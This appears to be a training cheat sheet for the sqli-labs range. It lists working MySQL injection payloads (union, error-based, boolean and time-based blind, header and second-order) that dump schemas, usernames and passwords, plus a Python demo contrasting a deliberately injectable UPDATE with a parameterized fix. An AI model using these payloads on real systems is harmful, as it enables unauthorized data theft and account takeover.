Using the sqli-labs range as the example
I. UNION query SQL injection
order by N to find the number of columns (raise N until the query errors)
union select 1,2,3 to find which columns are echoed on the page
Dump the database version and the current database name:
union select 1,version(),database() --+
Dump the schema names:
union select 1,2,concat(schema_name) from information_schema.schemata limit 0,1 --+ (one at a time)
union select 1,2,group_concat(schema_name) from information_schema.schemata --+ (all at once)
Dump the table names:
union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+
Dump the column names:
union select 1,database(),(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users') --+
Dump the data:
union select 1,(select group_concat(id) from users),(select group_concat(username) from users) --+
II. Error-based SQL injection
extractvalue():
extractvalue() takes exactly two arguments; the second is an XPath expression, and an invalid one (here it starts with 0x7e, a '~') makes MySQL echo it back in the error message. A subquery placed inside it must return a single row, so page through results with limit N,1; the error message shows at most 32 characters of the value.
Dump the current database name:
and extractvalue(1,concat(0x7e,database(),0x7e)) --+
Dump the schema names:
and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e)) --+
Dump the table names:
and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e)) --+
Dump the column names:
and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),0x7e)) --+
Dump the data:
and extractvalue(1,concat(0x7e,(select concat(id,0x7e,username,0x7e,password) from users limit 0,1),0x7e)) --+
updatexml():
Same idea as extractvalue(), but it takes three arguments and the payload goes in the second one:
and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
floor():
Duplicate-key error: grouping on concat(<result>,floor(rand(0)*2)) makes MySQL raise a duplicate-entry error whose message contains the result followed by a 1. The inner subquery must return a single row:
and (select 1 from (select count(*),concat((select <query returning one row>),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
III. Boolean-based blind SQL injection
1) Determine lengths
1. Length of the current database name
and length(database())=8 --+
2. Number of tables in the current database
and ((select count(*) from information_schema.tables where table_schema=database())=4) --+
3. Length of each table name
and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 --+
4. Number of columns in a given table
and ((select count(*) from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1))=3) --+
5. Length of a field's value in a given row
and length((select username from users where id=1))=4 --+
and length((select password from users where id=1))=4 --+
2) Guess the contents, one character at a time, by comparing its ASCII code (comparing with > instead of = and halving the range each time needs about 7 requests per character instead of up to 95)
1. Name of the current database:
and ascii(substr(database(),1,1))=115 --+
2. Name of a table:
and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),5,1))=115 --+
3. Name of a column in that table:
and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1) limit 1,1),8,1))=101 --+
4. Values in the username column of users:
and ascii(substr((select username from users limit 0,1),1,1))=68 --+
IV. Time-based blind SQL injection
1. Confirming the injection point (the response is delayed by about 5 seconds if the payload executes)
and sleep(5) --+
2. if(condition, value_if_true, value_if_false)
Combined with the boolean tests above, this turns them into time-based blind injection: the response time, not the page content, carries the answer
and if(length(database())=8,sleep(5),1) --+
V. Stacked queries SQL injection (several statements separated by ';' in one request)
VI. HTTP header injection (the same payloads, placed in a header the application stores or logs)
1. User-Agent header injection
2. Referer header injection
3. Cookie header injection
4. Second-order injection
1. Register a user named after the target account with '# appended (for example admin'#), then change this new user's password. The name is escaped when it is stored, but the password-change UPDATE later reads the stored name back and concatenates it unescaped, so the ' closes the string and the # comments out the rest of the WHERE clause: the target account's password is changed, and the newly created user's password stays the same.
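The second-order case above, as an added example that is not sqli-labs code. It uses an in-memory SQLite database with constructed rows, so the page's admin'# becomes admin'-- (SQLite has no # comment). Registration binds its parameter and is safe on its own; the password change then trusts the stored name and concatenates it, which is where the payload fires. The fixed version beside it binds every value regardless of where it came from.

```python
"""Second-order injection: a name stored safely, then trusted and concatenated later.

Added example, not sqli-labs code. SQLite stands in for MySQL, so the text's
'#' comment becomes '--'. All rows are constructed.
"""
import sqlite3

SEED = [("admin", "admin-secret"), ("Dumb", "Dumb")]  # constructed accounts


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?)", SEED)
    return conn


def register(conn, username, password):
    """First order is safe: the bound parameter stores the quote literally."""
    conn.execute("INSERT INTO users VALUES (?,?)", (username, password))


def change_password_vulnerable(conn, session_user, current, new):
    """The username now comes from the session/database, is trusted, and is
    concatenated into the UPDATE: the stored payload fires here."""
    sql = (f"UPDATE users SET password='{new}' "
           f"WHERE username='{session_user}' AND password='{current}'")
    conn.execute(sql)


def change_password_fixed(conn, session_user, current, new):
    """Bound parameters everywhere, whatever the value's provenance."""
    conn.execute("UPDATE users SET password=? WHERE username=? AND password=?",
                 (new, session_user, current))


def password_of(conn, username):
    return conn.execute("SELECT password FROM users WHERE username=?",
                        (username,)).fetchone()[0]


def attack(fixed=False):
    """Register admin'-- , change its password, return (admin's, attacker's)."""
    conn = make_db()
    attacker = "admin'-- "  # the page's admin'# in SQLite comment syntax
    register(conn, attacker, "attacker-pass")
    change = change_password_fixed if fixed else change_password_vulnerable
    change(conn, attacker, "attacker-pass", "pwned")
    return password_of(conn, "admin"), password_of(conn, attacker)


if __name__ == "__main__":
    print("vulnerable:", attack())            # ('pwned', 'attacker-pass')
    print("fixed     :", attack(fixed=True))  # ('admin-secret', 'pwned')
```

With the vulnerable UPDATE the statement executed is UPDATE users SET password='pwned' WHERE username='admin'-- ' AND password='attacker-pass', so the password check and the attacker's own row are commented away and admin is overwritten.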